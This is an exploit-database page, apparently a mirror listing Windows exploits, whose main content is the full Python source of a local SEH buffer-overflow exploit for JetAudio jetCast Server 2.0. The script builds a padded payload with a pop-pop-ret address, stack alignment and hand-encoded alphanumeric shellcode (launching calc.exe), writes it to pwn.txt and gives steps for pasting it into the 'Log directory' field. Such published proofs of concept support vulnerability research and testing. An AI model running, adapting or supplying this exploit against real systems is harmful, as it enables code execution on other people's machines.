Menu

Improved exploit search engine. Try it out

"JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow"

Author

"Connor McGarr"

Platform

windows

Release date

2019-05-16

Release Date Title Type Platform Author
2019-07-17 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow" remote windows hyp3rlinx
2019-07-17 "Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-17 "WinMPG iPod Convert 3.0 - 'Register' Denial of Service" dos windows stresser
2019-07-16 "Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-16 "DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)" local windows "Xavi Beltran"
2019-07-16 "R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)" local windows blackleitus
2019-07-16 "Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection" dos windows hyp3rlinx
2019-07-15 "Streamripper 2.6 - 'Song Pattern' Buffer Overflow" local windows "Andrey Stoykov"
2019-07-15 "Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)" dos windows "RAMELLA Sebastien"
2019-07-12 "Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation" local windows "Google Security Research"
2019-07-11 "SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow" local windows xerubus
2019-07-12 "Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - NULL Pointer Dereferences in OpenType Font Handling While Accessing Empty dynarrays" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Multiple Bugs in OpenType Font Handling Related to the _post_ Table" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Out-of-Bounds Read in OpenType Font Handling Due to Undefined FontName Index" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling While Processing CFF Blend DICT Operator" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readStrings" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Unbounded iFD" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow Due to Integer Overflow in readTTCDirectory" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readCharset" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readFDSelect" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readEncoding" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Interpreter Stack Underflow in OpenType Font Handling Due to Missing CHKUFLOW" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Use of Uninitialized Memory While Freeing Resources in var_loadavar" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack-Based Buffer Overflow in do_set_weight_vector_cube for Large nAxes" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative nAxes" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling due to Out-of-Bounds cubeStackDepth" dos windows "Google Security Research"
Release Date Title Type Platform Author
2019-05-16 "JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow" local windows "Connor McGarr"
2019-05-07 "Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow" local windows "Connor McGarr"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46854/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46854/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46854/41291/jetaudio-jetcast-server-20-log-directory-local-seh-alphanumeric-encoded-buffer-overflow/download/", "exploit_id": "46854", "exploit_description": "\"JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow\"", "exploit_date": "2019-05-16", "exploit_author": "\"Connor McGarr\"", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
# Title: JetAudio jetCast Server 2.0 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: May 13th, 2019
# Author: Connor McGarr (https://connormcgarr.github.io)
# Vendor Homepage: http://www.jetaudio.com/
# Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
# Version v2.0
# Tested on: Windows XP SP3 EN

# TO RUN:
# 1. Run python script
# 2. Copy contents of pwn.txt
# 3. Open jetCast
# 4. Select Config
# 5. Paste contents of pwn.txt into "Log directory" field
# 6. Click "OK"
# 7. Click "Start"

# For zeroing out registers before manual shellcode
zero = "\x25\x01\x01\x01\x01"           	# and eax, 0x01010101
zero += "\x25\x10\x10\x10\x10"          	# and eax, 0x10101010

# Save old stack pointer
restore = "\x54"                                # push esp
restore += "\x59"                               # pop ecx
restore += "\x51"                               # push ecx

# Align the stack to 0012FFAD. Leaving enough room for shell. Using calc.exe for now.
# 4C4F5555 4C4F5555 4D505555
alignment = "\x54"				# push esp
alignment += "\x58"				# pop eax
alignment += "\x2d\x4c\x4f\x55\x55"		# and eax, 0x4C4F5555
alignment += "\x2d\x4c\x4f\x55\x55"		# and eax, 0x4C4F5555
alignment += "\x2d\x4d\x50\x55\x55"		# and eax, 0x4D505555
alignment += "\x50"				# push eax
alignment += "\x5c"				# pop esp

# calc.exe - once again, giving you enough room with alignment for shell. Calc.exe for now.
# 2C552D14 01552D14 01562E16
shellcode = zero
shellcode += "\x2d\x14\x2d\x55\x2c" 		# sub eax, 0x2C552D14
shellcode += "\x2d\x14\x2d\x55\x01" 		# sub eax, 0x01562D14
shellcode += "\x2d\x16\x2e\x56\x01" 		# sub eax, 0x01562E16
shellcode += "\x50" 				# push eax

# 24121729 24121739 2414194A
shellcode += zero
shellcode += "\x2d\x29\x17\x12\x24" 		# sub eax, 0x24121729
shellcode += "\x2d\x39\x17\x12\x24"     	# sub eax, 0x24121739
shellcode += "\x2d\x4a\x19\x14\x24"     	# sub eax, 0x2414194A (was 40 at the end, but a miscalc happened. Changed to 4A)
shellcode += "\x50" 				# push eax

# 34313635 34313434 34313434
shellcode += zero
shellcode += "\x2d\x35\x36\x31\x34" 		# sub eax, 0x34313635
shellcode += "\x2d\x34\x34\x31\x34" 		# sub eax, 0x34313434
shellcode += "\x2d\x34\x34\x31\x34" 		# sub eax, 0x34313434
shellcode += "\x50" 				# push eax

# 323A1245 323A1245 333A1245
shellcode += zero
shellcode += "\x2d\x45\x12\x3a\x32" 		# sub eax, 0x323A1245
shellcode += "\x2d\x45\x12\x3a\x32" 		# sub eax, 0x323A1245
shellcode += "\x2d\x45\x12\x3a\x33" 		# sub eax, 0x333A1245
shellcode += "\x50"				# push eax

# Restore old stack pointer. MOV ECX,ESP
move = zero
move += "\x2d\x40\x3f\x27\x11" 			# sub eax, 0x403F2711
move += "\x2d\x3f\x3f\x27\x11" 			# sub eax, 0x3F3F2711
move += "\x2d\x3f\x3f\x28\x11" 			# sub eax, 0x3F3F2811
move += "\x50" 					# push eax


payload = "\x41" * 520
payload += "\x70\x06\x71\x06"			# JO 6 bytes. If jump fails, default to JNO 6 bytes into shellcode.
payload += "\x2d\x10\x40\x5f"			# pop pop ret MFC42.DLL
payload += "\x41" * 2				# Padding to reach first instruction
payload += restore
payload += alignment
payload += shellcode
payload += move
# Using ECX for holding old ESP. \x41 = INC ECX
# so using \x42 = INC EDX instead.
payload += "\x42" * (5000-len(payload))

f = open('pwn.txt', 'w')
f.write(payload)
f.close()